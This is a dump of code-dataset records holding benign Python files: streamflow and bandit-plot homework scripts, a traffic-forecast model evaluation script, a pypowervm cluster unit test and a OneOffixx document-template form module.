plt.legend()\r\n\r\n pltTitle = instance.replace('../instances/', '')\r\n pltTitle = pltTitle.replace('.txt', '')\r\n pltTitle = pltTitle.replace('i-', 'Instance ')\r\n # plt.plot(x_axis,kl_ucb,x_axis,ts,x_axis,ucb,x_axis,eg)\r\n plt.title(\"{}\".format(pltTitle))\r\n plt.savefig(\"testT2_instance{}.png\".format(i+1))", "sub_path": "Assignment1/submission/PlotGenT2.py", "file_name": "PlotGenT2.py", "file_ext": "py", "file_size_in_byte": 1863, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.log2", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.log2", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.ticker.ScalarFormatter", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}]}
+{"seq_id": "8280225", "text": "# Example solution for HW 4\n\n# %%\n# Import the modules we will use\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# %%\n# ** MODIFY **\n# Set the file name and path to where you have stored the data\nfilename = 'streamflow_week5.txt'\nfilepath = os.path.join('data', filename)\nprint(os.getcwd())\nprint(filepath)\n\n# filepath = '../Assignments/Solutions/data/streamflow_week1.txt'\n\n# %%\n#Read the data into a pandas dataframe\ndata=pd.read_table(filepath, sep = '\\t', skiprows=30,\n names=['agency_cd', 'site_no', 'datetime', 'flow', 'code']\n )\n\n# Expand the dates to year month day\ndata[[\"year\", \"month\", \"day\"]] =data[\"datetime\"].str.split(\"-\", expand=True)\ndata['year'] = data['year'].astype(int)\ndata['month'] = data['month'].astype(int)\ndata['day'] = data['day'].astype(int)\n\n# %%\n# Sorry no more helpers past here this week, you are on your own now :) \n# Hints - you will need the functions: describe, info, groupby, sort, head and tail.\n#%%\n# Esimation5\ndata.flow\n# print(data.datetime[(data.flow >= rnge[0]) & (data.flow <= rnge[1])])\n\n# list_2010 = []\n# list_2011 = []\n# list_2012 = []\n# list_2013 = []\n# list_2014 = []\n# list_2015 = []\n# list_2016 = []\n# list_2017 = []\n# list_2016 = []\n# list_2017 = []\n# list_2020 = []\n\n# data.flow[(data.year >= 2010) & (data.year <= 2020) & (data.month == i)].mean]\n#%%\n# 1, 3, 5, 7, 8, 10, 12\nfor d in range(2010, 2020):\n fig1 = plt.figure()\n fig1.patch.set_facecolor('xkcd:mint green')\n plt.title('%d'%(d))\n plt.ylabel('flow')\n for i in (1, 3, 5, 7, 8, 10, 12):\n # print(i)\n # print(data.flow[(data.year == 2010) & (data.month == i)].mean)\n # print(\"\\n\")\n # data.flow[(data.year == 2010) & (data.month == i)]\n x = list(range(1, 32))\n plt.plot(x, (data.flow[(data.year == d) & (data.month == i)]))\n plt.xlabel('days in month')\n plt.legend(['1', '3', '5', '7', '8', '10', '12'])\n plt.savefig('graphs/flow-set1_%d'%(d))\n\n \n# x = list(range(1, 32))\n# print(x)\n\n\n# print(flow_data.size)\n# print(flow_data.shape)\n# flow_202009 = flow_data[11571:11585, 3]\n# print(flow_202009)\n\n# x = [6.,7,8,9,10,11,12,13,14,15,16,17,18,19]\n# fig9 = plt.figure()\n# fig9.patch.set_facecolor('xkcd:mint green')\n# plt.plot(x, flow_202009)\n# plt.xlabel('days in September 2020')\n# plt.ylabel('flow')\n# plt.legend()\n# plt.savefig('graphs/flow_202009')\n\n# %%\n# 4, 6, 9, 11\nfor d in range(2010, 2020):\n fig2 = plt.figure()\n fig2.patch.set_facecolor('xkcd:mint green')\n plt.title('%d'%(d))\n plt.ylabel('flow')\n for i in (4, 6, 9, 11):\n # print(i)\n # print(data.flow[(data.year == 2010) & (data.month == i)].mean)\n # print(\"\\n\")\n # data.flow[(data.year == 2010) & (data.month == i)]\n x = list(range(1, 31))\n # print(x)\n plt.plot(x, (data.flow[(data.year == d) & (data.month == i)]))\n plt.xlabel('days in the month')\n plt.legend(['4', '6', '9', '11'])\n plt.savefig('graphs/flow-set2_%d'%(d))\n# %%\n# 2020\n\nfig3 = plt.figure()\nfig3.patch.set_facecolor('xkcd:mint green')\nplt.title('2020')\nplt.ylabel('flow')\nfor i in (1, 3, 5, 7, 8):\n # print(i)\n # print(data.flow[(data.year == 2010) & (data.month == i)].mean)\n # print(\"\\n\")\n # data.flow[(data.year == 2010) & (data.month == i)]\n x = list(range(1, 32))\n # print(x)\n plt.plot(x, (data.flow[(data.year == 2020) & (data.month == i)]))\n plt.xlabel('days in the month')\n plt.legend(['1', '3', '5', '7', '8'])\n plt.savefig('graphs/flow-set3_2020-%i'%(i))\n\ndata.flow[(data.year == 2020) & (data.month == 1)]\n\nfig4 = plt.figure()\nfig4.patch.set_facecolor('xkcd:mint green')\nplt.title('2020')\nplt.ylabel('flow')\nfor i in (4, 6):\n # print(i)\n # print(data.flow[(data.year == 2010) & (data.month == i)].mean)\n # print(\"\\n\")\n # data.flow[(data.year == 2010) & (data.month == i)]\n x = list(range(1, 31))\n # print(x)\n plt.plot(x, (data.flow[(data.year == 2020) & (data.month == i)]))\n plt.xlabel('days in the month')\n plt.legend(['4', '6'])\n plt.savefig('graphs/flow-set4_2020-%i'%(i))\n# %%\n# When September Ends\nx = list(range(1, 27))\nfig5 = plt.figure()\nfig5.patch.set_facecolor('xkcd:mint green')\nplt.title('2020-9')\nplt.ylabel('flow')\nplt.plot(x, (data.flow[(data.year == 2020) & (data.month == 9)]))\nplt.xlabel('days in the month')\nplt.legend([])\nplt.savefig('graphs/flow-set5_2020-9')\n\nprint((data.flow[(data.year == 2020) & (data.month == 9)]))\n# %%\n", "sub_path": "assignment_5/week5_pandas_starter_BM.py", "file_name": "week5_pandas_starter_BM.py", "file_ext": "py", "file_size_in_byte": 4760, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.read_table", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 149, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 153, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}]}
+{"seq_id": "499603482", "text": "import os\nimport sys\nimport torch\nfrom collections import defaultdict\nimport json\nimport pickle\nimport logging\nlogging.basicConfig()\n\nsys.path.append(os.getcwd())\nfrom generalization_config import config\nfrom utils.graph_utils import create_adj_matrix, blockify_A, create_coordinate_channel, \\\n create_edge_index_from_adjacency_matrix\nfrom utils.training_gcn_utils import validate\nfrom utils.training_unet_utils import validate as validate_unet\nfrom utils.videoloader import trafic4cast_dataset\n\n\nfrom models.unet import UNet\nfrom models.graph_models import KipfNet_orig, KipfNet, KipfNetd2, Graph_resnet\n\n\n\ndef get_graphdata_obj(inputs, edge_index, y, num_features=38, num_classes=9):\n graphdata = Data(x=inputs, edge_index=edge_index, y=y)\n\n return graphdata\n\n\ndef get_n_params(model):\n pp = 0\n for p in list(model.parameters()):\n nn = 1\n for s in list(p.size()):\n nn = nn * s\n pp += nn\n return pp\n\n\nif __name__ == \"__main__\":\n print('batch_size: ', config['dataloader']['batch_size'])\n print(config['device_num'])\n device = torch.device(config['device_num'])\n\n model_tuple_list = config['model_tuple_list']\n\n resultdict = defaultdict(dict)\n\n for city in ['Berlin', 'Moscow', 'Istanbul']:\n config['dataset']['cities'] = [city]\n\n dataset_val = trafic4cast_dataset(split_type='validation', **config['dataset'],\n reduce=True, filter_test_times=True)\n\n val_loader = torch.utils.data.DataLoader(dataset_val, shuffle=False,\n **config['dataloader'])\n\n for model_tuple in model_tuple_list:\n model_plot_name = model_tuple[0]\n model_path = model_tuple[1]\n is_graph = model_tuple[2]\n graph_model_name = model_tuple[3]\n\n with open(os.path.join(model_path, 'config.json'), 'r') as f:\n model_config = json.load(f)\n\n adj, nn_ixs, G, mask = create_adj_matrix(city=config['dataset']['cities'][0],\n mask_threshold=config['mask_threshold'])\n\n if not is_graph:\n model_config['model']['batch_norm'] = True\n model = UNet(**model_config['model']).to(device)\n model.load_state_dict(torch.load(os.path.join(model_path, 'checkpoint.pt'),\n map_location=device))\n\n mask = torch.from_numpy(mask).to(device)\n\n if 'MIE-Lab' in model_plot_name:\n norm = False\n else:\n norm = True\n\n val_loss = validate_unet(model=model, val_loader=val_loader, device=device, mask=mask,\n config=model_config, print_loss=False, norm=norm)\n\n if is_graph:\n\n n_features = 38\n batch_size = config['dataloader']['batch_size']\n assert batch_size == 1, \"batch_size should be 1 for graphs\"\n\n coords = create_coordinate_channel(b=batch_size)\n\n if config['dataloader']['batch_size'] > 1:\n adj = blockify_A(adj, config['dataloader']['batch_size'])\n\n edge_index = create_edge_index_from_adjacency_matrix(adj)\n edge_index = edge_index.to(device)\n\n if graph_model_name == 'kipfnet':\n model = KipfNet_orig(num_features=n_features,\n num_classes=9, **model_config['model']['KIPF']).to(device)\n model.load_state_dict(torch.load(os.path.join(model_path, 'checkpoint.pt'),\n map_location=device))\n\n elif graph_model_name == 'skipfnet':\n model = KipfNet(num_features=n_features,\n num_classes=9, **model_config['model']['KipfNet']).to(device)\n model.load_state_dict(torch.load(os.path.join(model_path, 'checkpoint.pt'),\n map_location=device))\n\n elif graph_model_name == 'skipfnet2d':\n model = KipfNetd2(num_features=n_features,\n num_classes=9, **model_config['model']['KipfNetd2']).to(device)\n model.load_state_dict(torch.load(os.path.join(model_path, 'checkpoint.pt'),\n map_location=device))\n\n elif graph_model_name == 'Graph_resnet':\n model = Graph_resnet(num_features=n_features,\n num_classes=9, **model_config['model']['Graph_resnet']).to(device)\n model.load_state_dict(torch.load(os.path.join(model_path, 'checkpoint.pt'),\n map_location=device))\n\n mask = None\n val_loss = validate(model=model, val_loader=val_loader, device=device,\n adj=adj, nn_ixs=nn_ixs, edge_index=edge_index, coords=coords,\n mask=mask, batch_size=batch_size, print_loss=False)\n\n print(\"Validation loss {}: {} = {:.2f}\".format(city, model_plot_name, val_loss))\n resultdict[model_plot_name][city] = val_loss\n\n nb_params = get_n_params(model)\n resultdict[model_plot_name]['nb_params'] = nb_params\n\n pickle.dump(resultdict, open(os.path.join('.', 'output', 'data_generalization.p'), 'wb'))\n", "sub_path": "experiment/generalization.py", "file_name": "generalization.py", "file_ext": "py", "file_size_in_byte": 5807, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.basicConfig", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 10, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 41, "usage_type": "name"}, {"api_name": "generalization_config.config", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 43, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 43, "usage_type": "name"}, {"api_name": "generalization_config.config", "line_number": 45, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 47, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 50, "usage_type": "name"}, {"api_name": "utils.videoloader.trafic4cast_dataset", "line_number": 52, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 55, "usage_type": "attribute"}, {"api_name": "generalization_config.config", "line_number": 56, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 65, "usage_type": "call"}, {"api_name": "utils.graph_utils.create_adj_matrix", "line_number": 67, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 67, "usage_type": "name"}, {"api_name": "generalization_config.config", "line_number": 68, "usage_type": "name"}, {"api_name": "models.unet.UNet", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 76, "usage_type": "call"}, {"api_name": "utils.training_unet_utils.validate", "line_number": 83, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 89, "usage_type": "name"}, {"api_name": "utils.graph_utils.create_coordinate_channel", "line_number": 92, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 94, "usage_type": "name"}, {"api_name": "utils.graph_utils.blockify_A", "line_number": 95, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 95, "usage_type": "name"}, {"api_name": "utils.graph_utils.create_edge_index_from_adjacency_matrix", "line_number": 97, "usage_type": "call"}, {"api_name": "models.graph_models.KipfNet_orig", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "models.graph_models.KipfNet", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "models.graph_models.KipfNetd2", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}, {"api_name": "models.graph_models.Graph_resnet", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path", "line_number": 121, "usage_type": "attribute"}, {"api_name": "utils.training_gcn_utils.validate", "line_number": 125, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path", "line_number": 135, "usage_type": "attribute"}]}
+{"seq_id": "252197386", "text": "# Copyright 2015 IBM Corp.\n#\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport unittest\n\nimport mock\n\nimport pypowervm.entities as ent\nimport pypowervm.tasks.cluster_ssp as cs\nimport pypowervm.tests.tasks.util as tju\nimport pypowervm.util as u\nimport pypowervm.wrappers.cluster as clust\nimport pypowervm.wrappers.job as jwrap\nimport pypowervm.wrappers.storage as stor\n\nCREATE_CLUSTER = 'cluster_create_job_template.txt'\n\n\nclass TestClusterSSP(unittest.TestCase):\n\n @mock.patch('pypowervm.wrappers.job.Job.delete_job')\n @mock.patch('pypowervm.wrappers.job.Job._monitor_job')\n @mock.patch('pypowervm.wrappers.job.Job.job_status')\n @mock.patch('pypowervm.adapter.Adapter')\n def test_crt_cluster_ssp(self, mock_adp, mock_status, mock_monitor_job,\n mock_del_job):\n # Load up GET Cluster/do/Create (job template)\n mock_adp.read.return_value = tju.load_file(CREATE_CLUSTER, mock_adp)\n # We'll pretend the job ran and completed successfully\n mock_monitor_job.return_value = False\n mock_status.__get__ = mock.Mock(\n return_value=jwrap.JobStatus.COMPLETED_OK)\n\n # Mock Job.create_job to check job parameter values\n def create_job(job_el, entry_type, *args, **kwargs):\n self.assertEqual(entry_type, clust.Cluster.schema_type)\n job = jwrap.Job.wrap(ent.Entry({}, job_el, None))\n param_vals = job._get_vals(u.xpath(\n 'JobParameters', 'JobParameter', 'ParameterValue'))\n self.assertEqual(\n param_vals[0],\n 'clust_namerepos_pv_namevios15XXXXYYYZZZZZZZ')\n self.assertEqual(\n param_vals[1],\n '<'\n 'uom:Metadata>hdisk1'\n 'hdisk2hdisk3ssp'\n '_name')\n return mock.MagicMock()\n mock_adp.create_job.side_effect = create_job\n node = clust.Node.bld(\n mock_adp, hostname='vios1', lpar_id=5, mtms='XXXX-YYY*ZZZZZZZ',\n vios_uri='https://a.example.com:12443/rest/api/uom/VirtualIOServe'\n 'r/12345678-1234-1234-1234-123456789012')\n repos = stor.PV.bld(mock_adp, name='repos_pv_name')\n data = [stor.PV.bld(mock_adp, name=n) for n in (\n 'hdisk1', 'hdisk2', 'hdisk3')]\n cs.crt_cluster_ssp('clust_name', 'ssp_name', repos, node, data)\n # run_job() should run delete_job() at the end\n self.assertEqual(mock_del_job.call_count, 1)\n", "sub_path": "pypowervm/tests/tasks/test_cluster_ssp.py", "file_name": "test_cluster_ssp.py", "file_ext": "py", "file_size_in_byte": 5123, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "unittest.TestCase", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pypowervm.tests.tasks.util.load_file", "line_number": 41, "usage_type": "call"}, {"api_name": "pypowervm.tests.tasks.util", "line_number": 41, "usage_type": "name"}, {"api_name": "mock.Mock", "line_number": 44, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.job.JobStatus", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.job", "line_number": 45, "usage_type": "name"}, {"api_name": "pypowervm.wrappers.cluster.Cluster", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.cluster", "line_number": 49, "usage_type": "name"}, {"api_name": "pypowervm.wrappers.job.Job.wrap", "line_number": 50, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.job.Job", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.job", "line_number": 50, "usage_type": "name"}, {"api_name": "pypowervm.entities.Entry", "line_number": 50, "usage_type": "call"}, {"api_name": "pypowervm.entities", "line_number": 50, "usage_type": "name"}, {"api_name": "pypowervm.util.xpath", "line_number": 51, "usage_type": "call"}, {"api_name": "pypowervm.util", "line_number": 51, "usage_type": "name"}, {"api_name": "mock.MagicMock", "line_number": 86, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.cluster.Node.bld", "line_number": 88, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.cluster.Node", "line_number": 88, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.cluster", "line_number": 88, "usage_type": "name"}, {"api_name": "pypowervm.wrappers.storage.PV.bld", "line_number": 92, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.storage.PV", "line_number": 92, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.storage", "line_number": 92, "usage_type": "name"}, {"api_name": "pypowervm.wrappers.storage.PV.bld", "line_number": 93, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.storage.PV", "line_number": 93, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.storage", "line_number": 93, "usage_type": "name"}, {"api_name": "pypowervm.tasks.cluster_ssp.crt_cluster_ssp", "line_number": 95, "usage_type": "call"}, {"api_name": "pypowervm.tasks.cluster_ssp", "line_number": 95, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 34, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 35, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 36, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "111741236", "text": "from copy import deepcopy\nfrom opengever.base.schema import TableChoice\nfrom opengever.oneoffixx import _\nfrom opengever.oneoffixx.api_client import OneoffixxAPIClient\nfrom opengever.oneoffixx.command import CreateDocumentFromOneOffixxTemplateCommand\nfrom opengever.oneoffixx.utils import whitelisted_template_types\nfrom plone.i18n.normalizer.interfaces import IFileNameNormalizer\nfrom plone.supermodel import model\nfrom plone.z3cform.layout import FormWrapper\nfrom z3c.form import button\nfrom z3c.form.field import Fields\nfrom z3c.form.form import Form\nfrom zope import schema\nfrom zope.component import getUtility\nfrom zope.i18n import translate\nfrom zope.interface import provider\nfrom zope.schema.interfaces import IContextSourceBinder\nfrom zope.schema.vocabulary import SimpleVocabulary\n\n\ndef get_oneoffixx_favorites():\n \"\"\"Return the user chosen favorites as a template group, if any.\"\"\"\n api_client = OneoffixxAPIClient()\n favorites = api_client.get_oneoffixx_favorites()\n if favorites.get('templates'):\n return favorites\n return None\n\n\ndef get_oneoffixx_template_groups():\n \"\"\"Return the template groups.\n\n Potentially amended with user chosen favorites.\n \"\"\"\n api_client = OneoffixxAPIClient()\n # We need to work on a copy to not pollute the cached one\n template_groups = deepcopy(api_client.get_oneoffixx_template_groups())\n favorites = get_oneoffixx_favorites()\n if favorites:\n template_groups.insert(0, favorites)\n return template_groups\n\n\ndef get_oneoffixx_templates():\n \"\"\"Return all oneoffixx templates.\n\n We do not want duplicates from favorites here.\n \"\"\"\n api_client = OneoffixxAPIClient()\n return (\n OneOffixxTemplate(template, template_group.get('localizedName', ''))\n for template_group in api_client.get_oneoffixx_template_groups()\n for template in template_group.get(\"templates\")\n if template.get('metaTemplateId') in whitelisted_template_types\n )\n\n\ndef default_template_group():\n \"\"\"Return all templates, or the user favorites, if defined by user.\"\"\"\n favorites = get_oneoffixx_favorites()\n if favorites:\n return favorites.get('id')\n return None\n\n\n@provider(IContextSourceBinder)\ndef list_templates(context):\n \"\"\"Return a list available templates.\"\"\"\n templates = get_oneoffixx_templates()\n template_group = context.REQUEST.form.get('form.widgets.template_group')\n terms = []\n\n for template in templates:\n terms.append(SimpleVocabulary.createTerm(\n template, template.template_id, template.title))\n\n # We filter templates when template_group has been selected\n if template_group is not None:\n favorites = get_oneoffixx_favorites()\n # Favorites are a special case\n if favorites and template_group[0] == favorites.get('id'):\n terms = [\n SimpleVocabulary.createTerm(\n OneOffixxTemplate(\n template, favorites.get('localizedName', '')),\n template.get('id'),\n template.get('localizedName'),\n )\n for template in favorites.get('templates')\n ]\n elif template_group[0] != '--NOVALUE--':\n terms = [term for term in terms if term.value.group == template_group[0]]\n\n return MutableObjectVocabulary(terms)\n\n\n@provider(IContextSourceBinder)\ndef list_template_groups(context):\n \"\"\"Return the list of available template groups.\"\"\"\n template_groups = get_oneoffixx_template_groups()\n terms = []\n for group in template_groups:\n terms.append(SimpleVocabulary.createTerm(group.get(\"id\"),\n group.get(\"id\"),\n group.get(\"localizedName\")))\n return MutableObjectVocabulary(terms)\n\n\nclass OneOffixxTemplate(object):\n\n def __init__(self, template, groupname):\n self.title = template.get(\"localizedName\")\n self.template_id = template.get(\"id\")\n self.group = template.get('templateGroupId')\n self.groupname = groupname\n template_type = template['metaTemplateId']\n template_type_info = whitelisted_template_types[template_type]\n self.content_type = template_type_info['content-type']\n filename = template.get(\"localizedName\")\n normalizer = getUtility(IFileNameNormalizer, name='gever_filename_normalizer')\n self.filename = normalizer.normalize(filename, extension=template_type_info['extension'])\n self.languages = template.get(\"languages\")\n\n def __eq__(self, other):\n if type(other) == type(self):\n return 